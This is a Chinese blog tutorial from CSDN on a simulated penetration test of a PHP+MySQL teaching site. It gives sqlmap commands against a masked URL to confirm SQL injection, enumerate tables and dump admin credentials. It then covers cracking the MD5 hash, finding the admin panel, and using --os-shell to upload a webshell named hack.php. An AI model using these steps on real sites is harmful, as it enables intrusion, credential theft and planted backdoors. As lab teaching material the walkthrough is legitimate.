渗透测试模拟(使用sqlmap进行sql注入漏洞判断,利用该漏洞进行挂马)

本文介绍了如何对PHP+MySQL网站进行渗透测试,利用sqlmap工具探测SQL注入漏洞,获取数据库信息,包括数据库名、表名、列名及字段数据。通过MD5解密获取密码,寻找后台地址,并利用sqlmap上传大马以获得操作系统级别的控制。
摘要由CSDN通过智能技术生成

环境:对某网站进行渗透测试。

(PHP+Mysql开发的网站,用于WEB漏洞教学和检测的)

工具:sqlmap(Kali Linux中自带or官网下载Windows版)

此次实验所涉及的sqlmap参数:


一、信息收集

二、漏洞挖掘

(1)判断网站是否存在sql注入漏洞

使用工具,sqlmap:sqlmap -u "目标网站地址" --batch

(2)存在 sql注入漏洞,

使用sqlmap进行sql注入,并获取后台管理员的账号和密码。

1、先跑出当前网站所使用的数据库库名

(sqlmap -u "http://*********/product.php?cid=4" --current-db)

当前数据库:’510cms‘。

2、求当前数据库下所有表名

(sqlmap -u "http://*************/product.php?cid=4" -D 510cms --tables)

3、求指定表内列名

(sqlmap -u "http://***********/product.php?cid=4" -D 510cms -T 510_admin --columns)

4、求指定列名的字段

(sqlmap -u "http://*********/product.php?cid=4" -D 510cms -T 510_admin -C name,passwd --dump)

三、获取账户密码后就可以登录网站后台()

(1)使用md5在线解密破解密码

获取弱口令

(2)找到后台地址就可以登录了
(3)如何获取网站后台地址(参考之前的一篇)

(223条消息) 渗透测试中的信息收集(使用相关工具,收集网站的子域名,扫描网站的后台地址)_net1996的博客-CSDN博客

四、攻击网站,利用sqlmap上传大马,可以对网站进行后台操作

(1)

(sqlmap -u "http://************/product.php?cid=4" --os-shell)

四个选项:

(2)进入如上网站,上传自己准备的大马(hack.php)
(3)上传成功后,在网站原址后加上/hack.php即可进入操作界面

(http://***********/hack.php)密码在大马文件中有。

  • 0
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值